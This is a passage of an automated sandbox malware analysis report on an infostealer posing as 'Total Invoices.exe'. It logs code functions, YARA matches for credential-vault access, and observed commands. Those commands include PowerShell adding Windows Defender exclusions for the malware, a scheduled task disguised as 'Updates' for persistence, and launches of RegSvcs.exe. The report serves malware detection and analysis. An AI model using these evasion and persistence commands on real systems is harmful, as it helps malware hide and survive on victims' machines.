                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD45940_2_07AD4594
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADB5F80_2_07ADB5F8
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD43D80_2_07AD43D8
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD22B00_2_07AD22B0
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD22C00_2_07AD22C0
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADB1C00_2_07ADB1C0
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADAD880_2_07ADAD88
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADAD700_2_07ADAD70
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADCCA00_2_07ADCCA0
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADCC8F0_2_07ADCC8F
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_0DE438A00_2_0DE438A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FA49B8_2_016FA49B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FD6688_2_016FD668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4AD08_2_016F4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F3EB88_2_016F3EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F42008_2_016F4200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06469DCC8_2_06469DCC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06478EDA8_2_06478EDA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_064732588_2_06473258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06475A388_2_06475A38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_064742B08_2_064742B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_064700408_2_06470040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0647C0588_2_0647C058
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0647E0688_2_0647E068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_064753588_2_06475358
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0647399B8_2_0647399B
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_012FD5DC9_2_012FD5DC
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_08FC27E09_2_08FC27E0
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_099008189_2_09900818
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_09900B909_2_09900B90
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990AD889_2_0990AD88
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990CC8F9_2_0990CC8F
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990CCA09_2_0990CCA0
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990B1C09_2_0990B1C0
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_099042989_2_09904298
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_099022B09_2_099022B0
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_099042A89_2_099042A8
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_099022C09_2_099022C0
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990B5F89_2_0990B5F8
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990D6509_2_0990D650
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_0990D6409_2_0990D640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00E5A3E013_2_00E5A3E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00E5D72813_2_00E5D728
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00E54AD013_2_00E54AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00E53EB813_2_00E53EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00E5420013_2_00E54200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D3B65B13_2_05D3B65B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D39BB413_2_05D39BB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D48EDB13_2_05D48EDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D4004013_2_05D40040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D4E07313_2_05D4E073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D442B013_2_05D442B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D4325813_2_05D43258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D45A3813_2_05D45A38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D439B313_2_05D439B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D4535813_2_05D45358
                      Source: Total Invoices.exe, 00000000.00000002.1728355804.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1730336857.0000000003440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004B5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000000.1632814911.0000000000C64000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaDox.exe6 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1737514998.0000000007E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1729679619.0000000003080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1730336857.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Total Invoices.exe
                      Source: Total Invoices.exe, 00000000.00000002.1735608541.00000000059B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Total Invoices.exe
                      Source: Total Invoices.exeBinary or memory string: OriginalFilenameaDox.exe6 vs Total Invoices.exe
                      Source: Total Invoices.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Total Invoices.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: dWXyZYb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile created: C:\Users\user\AppData\Roaming\dWXyZYb.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMutant created: \Sessions\1\BaseNamedObjects\sTkHxGUfImc
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3C54.tmpJump to behavior
                      Source: Total Invoices.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Total Invoices.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Total Invoices.exeReversingLabs: Detection: 60%
                      Source: Total Invoices.exeVirustotal: Detection: 31%
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile read: C:\Users\user\Desktop\Total Invoices.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Total Invoices.exe "C:\Users\user\Desktop\Total Invoices.exe"
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\dWXyZYb.exe C:\Users\user\AppData\Roaming\dWXyZYb.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
